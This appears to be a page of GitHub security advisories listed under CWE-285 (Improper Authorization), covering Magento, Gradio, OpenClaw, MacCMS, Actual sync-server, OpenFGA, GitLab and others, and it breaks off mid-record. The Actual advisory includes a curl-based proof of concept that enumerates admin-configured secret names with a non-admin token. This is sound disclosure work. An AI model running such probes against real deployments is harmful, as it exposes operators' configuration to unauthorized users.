Common Weakness Enumeration

CWE-285

Discouraged

Improper Authorization

Abstraction: Class · Status: Draft

The product does not perform or incorrectly performs an authorization check when an actor attempts to access a resource or perform an action.

2329 vulnerabilities reference this CWE, most recent first.

GHSA-39RW-4M66-82GF

Vulnerability from github – Published: 2022-05-24 17:33 – Updated: 2025-02-10 20:37
VLAI
Summary
Magento incorrect user permissions vulnerability within the Inventory component
Details

Magento version 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect user permissions vulnerability within the Inventory component. This vulnerability could be abused by authenticated users with Inventory and Source permissions to make unauthorized changes to inventory source data via the REST API.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "magento/community-edition"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.3.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "magento/community-edition"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.4.0"
            },
            {
              "fixed": "2.4.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "2.4.0"
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "magento/project-community-edition"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2.0.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2020-24403"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-11T17:41:25Z",
    "nvd_published_at": "2020-11-09T01:15:00Z",
    "severity": "LOW"
  },
  "details": "Magento version 2.4.0 and 2.3.5p1 (and earlier) are affected by an incorrect user permissions vulnerability within the Inventory component. This vulnerability could be abused by authenticated users with Inventory and Source permissions to make unauthorized changes to inventory source data via the REST API.",
  "id": "GHSA-39rw-4m66-82gf",
  "modified": "2025-02-10T20:37:53Z",
  "published": "2022-05-24T17:33:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-24403"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/magento/magento2"
    },
    {
      "type": "WEB",
      "url": "https://helpx.adobe.com/security/products/magento/apsb20-59.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Magento incorrect user permissions vulnerability within the Inventory component"
}

GHSA-3C67-5HWX-F6WX

Vulnerability from github – Published: 2024-10-10 21:20 – Updated: 2025-01-21 17:57
VLAI
Summary
Gradios's CORS origin validation is not performed when the request has a cookie
Details

Impact

What kind of vulnerability is it? Who is impacted?

This vulnerability is related to CORS origin validation, where the Gradio server fails to validate the request origin when a cookie is present. This allows an attacker’s website to make unauthorized requests to a local Gradio server. Potentially, attackers can upload files, steal authentication tokens, and access user data if the victim visits a malicious website while logged into Gradio. This impacts users who have deployed Gradio locally and use basic authentication.

Patches

Yes, please upgrade to gradio>=4.44 to address this issue.

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

As a workaround, users can manually enforce stricter CORS origin validation by modifying the CustomCORSMiddleware class in their local Gradio server code. Specifically, they can bypass the condition that skips CORS validation for requests containing cookies to prevent potential exploitation.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "gradio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.44.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-47084"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-346"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-10-10T21:20:06Z",
    "nvd_published_at": "2024-10-10T22:15:10Z",
    "severity": "HIGH"
  },
  "details": "### Impact\n**What kind of vulnerability is it? Who is impacted?**\n\nThis vulnerability is related to **CORS origin validation**, where the Gradio server fails to validate the request origin when a cookie is present. This allows an attacker\u2019s website to make unauthorized requests to a local Gradio server. Potentially, attackers can upload files, steal authentication tokens, and access user data if the victim visits a malicious website while logged into Gradio. This impacts users who have deployed Gradio locally and use basic authentication.\n\n### Patches\nYes, please upgrade to `gradio\u003e=4.44` to address this issue.\n\n### Workarounds\n**Is there a way for users to fix or remediate the vulnerability without upgrading?**\n\nAs a workaround, users can manually enforce stricter CORS origin validation by modifying the `CustomCORSMiddleware` class in their local Gradio server code. Specifically, they can bypass the condition that skips CORS validation for requests containing cookies to prevent potential exploitation.\n\n",
  "id": "GHSA-3c67-5hwx-f6wx",
  "modified": "2025-01-21T17:57:09Z",
  "published": "2024-10-10T21:20:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-3c67-5hwx-f6wx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-47084"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/gradio-app/gradio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gradio/PYSEC-2024-196.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Gradios\u0027s CORS origin validation is not performed when the request has a cookie"
}

GHSA-3CVX-236H-M9FJ

Vulnerability from github – Published: 2026-03-03 21:49 – Updated: 2026-03-25 18:45
VLAI
Summary
OpenClaw has an opt-in insecure Control UI auth over plaintext HTTP could allow privileged access
Details

Description

In affected releases, when an operator explicitly enabled gateway.controlUi.allowInsecureAuth: true and exposed the gateway over plaintext HTTP, Control UI authentication could permit privileged operator access without the intended device identity + pairing guarantees.

This required an insecure deployment choice and credential exposure risk (for example, plaintext transit or prior token leak). It was fixed on main in commit 40a292619e1f2be3a3b1db663d7494c9c2dc0abf (PR #20684).

Affected Packages / Versions

  • Package: openclaw (npm)
  • Affected published versions: <= 2026.2.19-2
  • Planned patched version: 2026.2.21

Impact

In these explicitly insecure deployments, an attacker with leaked/intercepted credentials could obtain high-privilege Control UI access.

Fix Commit(s)

  • 40a292619e1f2be3a3b1db663d7494c9c2dc0abf (merged 2026-02-20)

OpenClaw thanks @Vasco0x4 for reporting.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2026.2.19-2"
      },
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2026.2.21"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-32034"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-319",
      "CWE-78"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-03T21:49:18Z",
    "nvd_published_at": "2026-03-19T22:16:39Z",
    "severity": "MODERATE"
  },
  "details": "## Description\n\nIn affected releases, when an operator explicitly enabled `gateway.controlUi.allowInsecureAuth: true` and exposed the gateway over plaintext HTTP, Control UI authentication could permit privileged operator access without the intended device identity + pairing guarantees.\n\nThis required an insecure deployment choice and credential exposure risk (for example, plaintext transit or prior token leak). It was fixed on `main` in commit `40a292619e1f2be3a3b1db663d7494c9c2dc0abf` ([PR #20684](https://github.com/openclaw/openclaw/pull/20684)).\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected published versions: `\u003c= 2026.2.19-2`\n- Planned patched version: `2026.2.21`\n\n## Impact\n\nIn these explicitly insecure deployments, an attacker with leaked/intercepted credentials could obtain high-privilege Control UI access.\n\n## Fix Commit(s)\n\n- `40a292619e1f2be3a3b1db663d7494c9c2dc0abf` (merged 2026-02-20)\n\nOpenClaw thanks @Vasco0x4 for reporting.",
  "id": "GHSA-3cvx-236h-m9fj",
  "modified": "2026-03-25T18:45:34Z",
  "published": "2026-03-03T21:49:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3cvx-236h-m9fj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32034"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/pull/20684"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/40a292619e1f2be3a3b1db663d7494c9c2dc0abf"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openclaw/openclaw"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-insecure-control-ui-authentication-over-plaintext-http"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenClaw has an opt-in insecure Control UI auth over plaintext HTTP could allow privileged access"
}

GHSA-3F5X-PCJQ-3PWW

Vulnerability from github – Published: 2026-03-23 00:31 – Updated: 2026-03-23 00:31
VLAI
Details

A weakness has been identified in MacCMS up to 2025.1000.4052. This vulnerability affects the function order_info of the file application/index/controller/User.php of the component Member Order Detail Interface. This manipulation of the argument order_id causes authorization bypass. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-4563"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-03-23T00:16:51Z",
    "severity": "MODERATE"
  },
  "details": "A weakness has been identified in MacCMS up to 2025.1000.4052. This vulnerability affects the function order_info of the file application/index/controller/User.php of the component Member Order Detail Interface. This manipulation of the argument order_id causes authorization bypass. It is possible to initiate the attack remotely. The exploit has been made available to the public and could be used for attacks.",
  "id": "GHSA-3f5x-pcjq-3pww",
  "modified": "2026-03-23T00:31:08Z",
  "published": "2026-03-23T00:31:08Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4563"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HuajiHD/CVE/issues/10"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.352400"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.352400"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?submit.775050"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-3F62-QV96-4P78

Vulnerability from github – Published: 2026-06-22 21:42 – Updated: 2026-06-22 21:42
VLAI
Summary
@actual-app/sync-server's missing authorization on GET /secret/:name allows non-admin OpenID users to enumerate admin-configured bank-sync secrets
Details

Summary

In @actual-app/sync-server, the GET /secret/:name endpoint (app-secrets.js:53) checks only that the caller has a valid session — it does not verify the caller is an admin. The sibling POST /secret/ handler does enforce an admin check in OpenID mode, exposing an authorization asymmetry. Any authenticated non-admin (BASIC) user in OpenID multi-user deployments can probe the secrets store and learn which admin-managed bank-sync integrations have been configured (existence, not values). This includes integration credentials that are not otherwise observable to non-admins, such as simplefin_accessKey, pluggyai_clientSecret, pluggyai_itemIds, and the gocardless_* secrets.

Details

packages/sync-server/src/app-secrets.js mounts validateSessionMiddleware at the router level (line 15), so all handlers inherit only "must be authenticated." The POST handler then explicitly upgrades to an admin check when the active auth method is openid:

// app-secrets.js:17-46
app.post('/', async (req, res) => {
  // ... look up active auth method ...
  if (method === 'openid') {
    const canSaveSecrets = isAdmin(res.locals.user_id);
    if (!canSaveSecrets) {
      res.status(403).send({
        status: 'error',
        reason: 'not-admin',
        details: 'You have to be admin to set secrets',
      });
      return;
    }
  }
  secretsService.set(name, value);
  // ...
});

The sibling GET handler skips both the method check and the admin check entirely:

// app-secrets.js:53-61
app.get('/:name', async (req, res) => {
  const name = req.params.name;
  const keyExists = secretsService.exists(name);
  if (keyExists) {
    res.sendStatus(204);
  } else {
    res.status(404).send('key not found');
  }
});

The intent — visible from the POST handler's "You have to be admin to set secrets" — is that this store holds admin-managed credentials. The valid secret names enumerated in services/secrets-service.js (SecretName) are: gocardless_secretId, gocardless_secretKey, simplefin_token, simplefin_accessKey, pluggyai_clientId, pluggyai_clientSecret, pluggyai_itemIds.

In OpenID mode, BASIC users obtain valid sessions through packages/sync-server/src/accounts/openid.ts:264-274 — either auto-created (userCreationMode=login) or pre-provisioned by the admin (userCreationMode=manual). With that BASIC session token they can hit GET /secret/:name and distinguish 204 (configured) from 404 (missing), enumerating each admin-managed secret name. Some signals (simplefin_token existence, pluggyai_clientId existence) are already coarsely observable via the unauthenticated bank-sync status endpoints (app-simplefin.js:18, app-pluggyai.js:18); the rest (simplefin_accessKey, pluggyai_clientSecret, pluggyai_itemIds, both gocardless_* secrets) are not otherwise probeable.

This is structurally identical to the previously reported missing-admin-check on GET /admin/users/ (app-admin.js:28): a POST sibling enforces admin authorization while the GET sibling omits it.

PoC

Pre-requisites: - Server is configured for OpenID multi-user mode (ACTUAL_OPENID_ENFORCE=true or auth method is openid). - An admin has configured one or more bank-sync integrations. - The attacker is any authenticated BASIC user (auto-created via userCreationMode=login, or admin-provisioned in the default manual mode).

Step 1 — capture a BASIC user's session token in $TOKEN (standard OpenID login flow, no admin role required).

Step 2 — probe each admin-managed secret name:

for name in gocardless_secretId gocardless_secretKey \
            simplefin_token simplefin_accessKey \
            pluggyai_clientId pluggyai_clientSecret pluggyai_itemIds; do
  status=$(curl -s -o /dev/null -w '%{http_code}' \
           -H "X-ACTUAL-TOKEN: $TOKEN" \
           https://actual.example.com/secret/$name)
  echo "$name -> $status"   # 204 = configured, 404 = missing
done

Step 3 — confirm the asymmetry by attempting to write a secret (correctly rejected for non-admins):

curl -s -H "X-ACTUAL-TOKEN: $TOKEN" \
     -H 'Content-Type: application/json' \
     -d '{"name":"pluggyai_itemIds","value":"x"}' \
     https://actual.example.com/secret/
# {"status":"error","reason":"not-admin","details":"You have to be admin to set secrets"}

The POST returns 403 not-admin; the GET returns 204/404 unauthenticated-against-role.

Impact

  • A non-admin authenticated user in OpenID multi-user mode can enumerate which admin-managed bank-sync integrations the deployment uses.
  • This reveals whether GoCardless, SimpleFIN, and/or Pluggy AI are configured, and which auxiliary credentials the admin has set (e.g. simplefin_accessKey, pluggyai_clientSecret, pluggyai_itemIds) — none of which are otherwise observable to non-admins.
  • The disclosure is existence-only; secret values are not returned. Impact is limited to recon useful for targeted follow-on attacks (e.g. credential phishing, picking which integration to attack on a separate vulnerability).
  • No integrity or availability impact.

Recommended Fix

Mirror the POST handler's admin gate on the GET handler. Minimal patch in packages/sync-server/src/app-secrets.js:

app.get('/:name', async (req, res) => {
  let method;
  try {
    const result = getAccountDb().first(
      'SELECT method FROM auth WHERE active = 1',
    );
    method = result?.method;
  } catch (error) {
    console.error('Failed to fetch auth method:', error);
    return res.status(500).send({
      status: 'error',
      reason: 'database-error',
      details: 'Failed to validate authentication method',
    });
  }

  if (method === 'openid' && !isAdmin(res.locals.user_id)) {
    return res.status(403).send({
      status: 'error',
      reason: 'not-admin',
      details: 'You have to be admin to read secret status',
    });
  }

  const name = req.params.name;
  const keyExists = secretsService.exists(name);
  if (keyExists) {
    res.sendStatus(204);
  } else {
    res.status(404).send('key not found');
  }
});

Consider factoring the method-lookup + admin-check into a shared helper used by both POST and GET to prevent the same asymmetry from recurring. Also consider restricting :name to the SecretName enum so unrelated probing is rejected up front.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@actual-app/sync-server"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "26.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-46700"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-22T21:42:34Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "## Summary\n\nIn `@actual-app/sync-server`, the `GET /secret/:name` endpoint (`app-secrets.js:53`) checks only that the caller has a valid session \u2014 it does not verify the caller is an admin. The sibling `POST /secret/` handler does enforce an admin check in OpenID mode, exposing an authorization asymmetry. Any authenticated non-admin (BASIC) user in OpenID multi-user deployments can probe the secrets store and learn which admin-managed bank-sync integrations have been configured (existence, not values). This includes integration credentials that are not otherwise observable to non-admins, such as `simplefin_accessKey`, `pluggyai_clientSecret`, `pluggyai_itemIds`, and the `gocardless_*` secrets.\n\n## Details\n\n`packages/sync-server/src/app-secrets.js` mounts `validateSessionMiddleware` at the router level (line 15), so all handlers inherit only \"must be authenticated.\" The POST handler then explicitly upgrades to an admin check when the active auth method is `openid`:\n\n```js\n// app-secrets.js:17-46\napp.post(\u0027/\u0027, async (req, res) =\u003e {\n  // ... look up active auth method ...\n  if (method === \u0027openid\u0027) {\n    const canSaveSecrets = isAdmin(res.locals.user_id);\n    if (!canSaveSecrets) {\n      res.status(403).send({\n        status: \u0027error\u0027,\n        reason: \u0027not-admin\u0027,\n        details: \u0027You have to be admin to set secrets\u0027,\n      });\n      return;\n    }\n  }\n  secretsService.set(name, value);\n  // ...\n});\n```\n\nThe sibling GET handler skips both the method check and the admin check entirely:\n\n```js\n// app-secrets.js:53-61\napp.get(\u0027/:name\u0027, async (req, res) =\u003e {\n  const name = req.params.name;\n  const keyExists = secretsService.exists(name);\n  if (keyExists) {\n    res.sendStatus(204);\n  } else {\n    res.status(404).send(\u0027key not found\u0027);\n  }\n});\n```\n\nThe intent \u2014 visible from the POST handler\u0027s \"You have to be admin to set secrets\" \u2014 is that this store holds admin-managed credentials. The valid secret names enumerated in `services/secrets-service.js` (`SecretName`) are: `gocardless_secretId`, `gocardless_secretKey`, `simplefin_token`, `simplefin_accessKey`, `pluggyai_clientId`, `pluggyai_clientSecret`, `pluggyai_itemIds`.\n\nIn OpenID mode, BASIC users obtain valid sessions through `packages/sync-server/src/accounts/openid.ts:264-274` \u2014 either auto-created (`userCreationMode=login`) or pre-provisioned by the admin (`userCreationMode=manual`). With that BASIC session token they can hit `GET /secret/:name` and distinguish 204 (configured) from 404 (missing), enumerating each admin-managed secret name. Some signals (`simplefin_token` existence, `pluggyai_clientId` existence) are already coarsely observable via the unauthenticated bank-sync status endpoints (`app-simplefin.js:18`, `app-pluggyai.js:18`); the rest (`simplefin_accessKey`, `pluggyai_clientSecret`, `pluggyai_itemIds`, both `gocardless_*` secrets) are not otherwise probeable.\n\nThis is structurally identical to the previously reported missing-admin-check on `GET /admin/users/` (`app-admin.js:28`): a POST sibling enforces admin authorization while the GET sibling omits it.\n\n## PoC\n\nPre-requisites:\n- Server is configured for OpenID multi-user mode (`ACTUAL_OPENID_ENFORCE=true` or auth method is `openid`).\n- An admin has configured one or more bank-sync integrations.\n- The attacker is any authenticated BASIC user (auto-created via `userCreationMode=login`, or admin-provisioned in the default `manual` mode).\n\nStep 1 \u2014 capture a BASIC user\u0027s session token in `$TOKEN` (standard OpenID login flow, no admin role required).\n\nStep 2 \u2014 probe each admin-managed secret name:\n\n```bash\nfor name in gocardless_secretId gocardless_secretKey \\\n            simplefin_token simplefin_accessKey \\\n            pluggyai_clientId pluggyai_clientSecret pluggyai_itemIds; do\n  status=$(curl -s -o /dev/null -w \u0027%{http_code}\u0027 \\\n           -H \"X-ACTUAL-TOKEN: $TOKEN\" \\\n           https://actual.example.com/secret/$name)\n  echo \"$name -\u003e $status\"   # 204 = configured, 404 = missing\ndone\n```\n\nStep 3 \u2014 confirm the asymmetry by attempting to write a secret (correctly rejected for non-admins):\n\n```bash\ncurl -s -H \"X-ACTUAL-TOKEN: $TOKEN\" \\\n     -H \u0027Content-Type: application/json\u0027 \\\n     -d \u0027{\"name\":\"pluggyai_itemIds\",\"value\":\"x\"}\u0027 \\\n     https://actual.example.com/secret/\n# {\"status\":\"error\",\"reason\":\"not-admin\",\"details\":\"You have to be admin to set secrets\"}\n```\n\nThe POST returns 403 `not-admin`; the GET returns 204/404 unauthenticated-against-role.\n\n## Impact\n\n- A non-admin authenticated user in OpenID multi-user mode can enumerate which admin-managed bank-sync integrations the deployment uses.\n- This reveals whether GoCardless, SimpleFIN, and/or Pluggy AI are configured, and which auxiliary credentials the admin has set (e.g. `simplefin_accessKey`, `pluggyai_clientSecret`, `pluggyai_itemIds`) \u2014 none of which are otherwise observable to non-admins.\n- The disclosure is existence-only; secret values are not returned. Impact is limited to recon useful for targeted follow-on attacks (e.g. credential phishing, picking which integration to attack on a separate vulnerability).\n- No integrity or availability impact.\n\n## Recommended Fix\n\nMirror the POST handler\u0027s admin gate on the GET handler. Minimal patch in `packages/sync-server/src/app-secrets.js`:\n\n```js\napp.get(\u0027/:name\u0027, async (req, res) =\u003e {\n  let method;\n  try {\n    const result = getAccountDb().first(\n      \u0027SELECT method FROM auth WHERE active = 1\u0027,\n    );\n    method = result?.method;\n  } catch (error) {\n    console.error(\u0027Failed to fetch auth method:\u0027, error);\n    return res.status(500).send({\n      status: \u0027error\u0027,\n      reason: \u0027database-error\u0027,\n      details: \u0027Failed to validate authentication method\u0027,\n    });\n  }\n\n  if (method === \u0027openid\u0027 \u0026\u0026 !isAdmin(res.locals.user_id)) {\n    return res.status(403).send({\n      status: \u0027error\u0027,\n      reason: \u0027not-admin\u0027,\n      details: \u0027You have to be admin to read secret status\u0027,\n    });\n  }\n\n  const name = req.params.name;\n  const keyExists = secretsService.exists(name);\n  if (keyExists) {\n    res.sendStatus(204);\n  } else {\n    res.status(404).send(\u0027key not found\u0027);\n  }\n});\n```\n\nConsider factoring the method-lookup + admin-check into a shared helper used by both POST and GET to prevent the same asymmetry from recurring. Also consider restricting `:name` to the `SecretName` enum so unrelated probing is rejected up front.",
  "id": "GHSA-3f62-qv96-4p78",
  "modified": "2026-06-22T21:42:34Z",
  "published": "2026-06-22T21:42:34Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/actualbudget/actual/security/advisories/GHSA-3f62-qv96-4p78"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/actualbudget/actual"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@actual-app/sync-server\u0027s missing authorization on GET /secret/:name allows non-admin OpenID users to enumerate admin-configured bank-sync secrets"
}

GHSA-3F6G-M4HR-59H8

Vulnerability from github – Published: 2024-08-09 21:23 – Updated: 2024-08-14 17:18
VLAI
Summary
OpenFGA Authorization Bypass
Details

Overview

OpenFGA v1.5.7 and v1.5.8 are vulnerable to authorization bypass when calling Check API with a model that uses but not and from expressions and a userset.

Fix

  • If you are using OpenFGA within Docker or as a Go library, as a binary, or through Docker, upgrade to v1.5.9 as soon as possible
  • If using Helm chart, upgrade to 0.2.12 as soon as possible.

This fix is backward compatible.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/openfga/openfga"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.5.7"
            },
            {
              "fixed": "1.5.9"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-42473"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-08-09T21:23:26Z",
    "nvd_published_at": "2024-08-12T13:38:35Z",
    "severity": "HIGH"
  },
  "details": "## Overview\n\nOpenFGA v1.5.7 and v1.5.8 are vulnerable to authorization bypass when calling Check API with a model that uses `but not` and `from` expressions and a userset. \n\n## Fix\n\n- If you are using OpenFGA within Docker or as a Go library, as a binary, or through Docker, upgrade to v1.5.9 as soon as possible\n- If using Helm chart, upgrade to 0.2.12 as soon as possible. \n\nThis fix is backward compatible.",
  "id": "GHSA-3f6g-m4hr-59h8",
  "modified": "2024-08-14T17:18:24Z",
  "published": "2024-08-09T21:23:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openfga/openfga/security/advisories/GHSA-3f6g-m4hr-59h8"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-42473"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/openfga/openfga"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "OpenFGA Authorization Bypass"
}

GHSA-3FCR-XQ7P-RFFP

Vulnerability from github – Published: 2026-02-12 00:31 – Updated: 2026-02-12 18:30
VLAI
Details

Vulnerabilities in the File Download and Get File handler components in CIPPlanner CIPAce before 9.17 allow attackers to download unauthorized files. An authenticated user can easily change the file id parameter or pass the physical file path in the URL query string to retrieve the files. (Retrieval is not intended without correct data access configured for documents.)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2024-50617"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-02-11T22:15:49Z",
    "severity": "HIGH"
  },
  "details": "Vulnerabilities in the File Download and Get File handler components in CIPPlanner CIPAce before 9.17 allow attackers to download unauthorized files. An authenticated user can easily change the file id parameter or pass the physical file path in the URL query string to retrieve the files. (Retrieval is not intended without correct data access configured for documents.)",
  "id": "GHSA-3fcr-xq7p-rffp",
  "modified": "2026-02-12T18:30:21Z",
  "published": "2026-02-12T00:31:03Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50617"
    },
    {
      "type": "WEB",
      "url": "https://cipplanner.com/cve-2024-50617-cve-public-notification-of-resolution"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3GCX-C67C-32VJ

Vulnerability from github – Published: 2022-05-24 16:49 – Updated: 2024-04-04 01:14
VLAI
Details

GitLab CE/EE, versions 8.8 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an authorization vulnerability that allows access to the web-UI as a user using a Personal Access Token of any scope.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2018-19569"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2019-07-10T16:15:00Z",
    "severity": "HIGH"
  },
  "details": "GitLab CE/EE, versions 8.8 up to 11.x before 11.3.11, 11.4 before 11.4.8, and 11.5 before 11.5.1, are vulnerable to an authorization vulnerability that allows access to the web-UI as a user using a Personal Access Token of any scope.",
  "id": "GHSA-3gcx-c67c-32vj",
  "modified": "2024-04-04T01:14:13Z",
  "published": "2022-05-24T16:49:55Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-19569"
    },
    {
      "type": "WEB",
      "url": "https://about.gitlab.com/2018/11/28/security-release-gitlab-11-dot-5-dot-1-released"
    },
    {
      "type": "WEB",
      "url": "https://gitlab.com/gitlab-org/gitlab-ce/issues/50319"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/109118"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-3GJX-HG47-FQ76

Vulnerability from github – Published: 2025-05-09 00:30 – Updated: 2025-05-09 00:30
VLAI
Details

Improper Authorization in Azure Automation allows an authorized attacker to elevate privileges over a network.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-29827"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-05-08T23:15:52Z",
    "severity": "CRITICAL"
  },
  "details": "Improper Authorization in Azure Automation allows an authorized attacker to elevate privileges over a network.",
  "id": "GHSA-3gjx-hg47-fq76",
  "modified": "2025-05-09T00:30:35Z",
  "published": "2025-05-09T00:30:35Z",
  "references": [
    {
      "type": "ADVISORY",
